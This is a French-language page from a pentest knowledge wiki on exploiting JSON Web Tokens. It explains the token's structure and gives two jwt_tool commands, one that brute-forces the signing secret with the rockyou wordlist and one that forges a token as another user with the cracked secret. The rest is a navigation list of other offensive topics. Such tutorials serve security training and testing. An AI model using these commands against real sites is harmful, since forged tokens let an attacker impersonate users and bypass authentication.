[Exploitation/Web] JWT

Introduction

Les JWT pour JSON web tokens sont des jetons utilisés un peu de la même manière que les cookies qui permettent de gérer l'authentification à une page. Ils sont segmentés en 3 parties séparées par des points :

Le header.
Le payload (contenu).
La signature.

Exploitation

Basique

Une fois connecté avec un utilisateur vous devriez avoir un jeton JWT. Pour l'obtenir, vous pouvez l'intercepter avec Burp.

Ensuite, vous pouvez le modifier grâce au site suivant :

https://token.dev/

Voici un outil très pratique pour l'exploitation de JWT :

https://github.com/ticarpi/jwt_tool

Pour lancer un brute force sur la signature pour retrouver le secret :

python3 jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiY2l0b3llbiIsImV4cCI6MTc0NzkzNjM1MH0.bRAr9miwEjxU72VPhiRZU94LCW5JBh2SlbLBZ_ENByA -C -d /usr/share/wordlists/rockyou.txt

Pour générer un nouveau token à partir du secret trouvé :

./jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoicGFscGF0aW5lIiwiZXhwIjoxNzQ3OTM1OTI4fQ.ss9aaYq766iYwebp8_9HouNXMN-QWgCsfaT2oaBo5jw -p "kaitlynn4" -pc user=palpatine -S hs256

[Exploitation/AD] Cheat-sheet

[Exploitation/AD] Kerberos

[Exploitation/AD] Initial Access

[Exploitation/AD] Password spraying et brute force

[Exploitation/AD] Credentials Harvesting

[Exploitation/AD] Exécution de commande à distance

[Exploitation/Windows] Récupération base SAM locale

[Exploitation/Windows] Reset mot de passe admin local

[Exploitation/Windows] Ouvrir un shell NT authorité système

[Exploitation/Windows] Connexion RDP

[Exploitation/Windows] Eternal Blue

[Exploitation/Windows] Antivirus/EDR Evasion

[Exploitation/Windows] Keylogger

[Exploitation/Windows] Living Off the Land

[Exploitation/Windows] Monitoring evasion

[Exploitation/Wifi] Drivers AWUS1900

[Exploitation/WiFi] Aircrack-ng

[Exploitation/Wifi] Wifite

[Exploitation/Wifi] HackrfOne

[Exploitation/Réseau] Metasploit

[Exploitation/Réseau] Exploit-DB & Searchsploit

[Exploitation/Réseau] Netcat

[Exploitation/Réseau] Pwncat

[Exploitation/Réseau] ICMP Reverse shell

[Exploitation/Réseau] Data exfiltration

[Exploitation/Réseau] IDS/IPS Evasion

[Exploitation/Réseau] Reverse shell

[Exploitation/Réseau] Sliver C2

[Exploitation/Réseau] Transfert de fichiers

[Exploitation/Web] BurpSuite

[Exploitation/Web] XSS

[Exploitation/Web] SQL injection

[Exploitation/Web] CSRF

[Exploitation/Web] File upload

[Exploitation/Web] LFI / RFI

[Exploitation/Web] Bypass 403

[Exploitation/Web] IP spoofing

[Exploitation/Web] CI/CD

[Exploitation/Web] Encodage

[Exploitation/Web] JWT

[Exploitation/Web] SSRF

[Exploitation/Web] SSTI

[Exploitation/Web] XSLT

[Exploitation/Web] Déserialisation

[Exploitation/Cracking] Mots de passe

[Exploitation/Cracking] Hash

[Cracking] Wordlists

[Exploitation/Cracking] Rainbow Tables

[Exploitation/Cracking] Wifi

[Exploitation/Stegano] StegHide

[Exploitation/Stegano] Stegseek

[Exploitation/Stegano] Strings

[Exploitation/Stegano] Exiftool

[Exploitation/Stegano] Aperi'Solve

[Exploitation/Stegano] PixRecovery & GHex

[Exploitation/Python] Payloads

[Exploitation/Web] JWT

Introduction

Exploitation

Basique

No Comments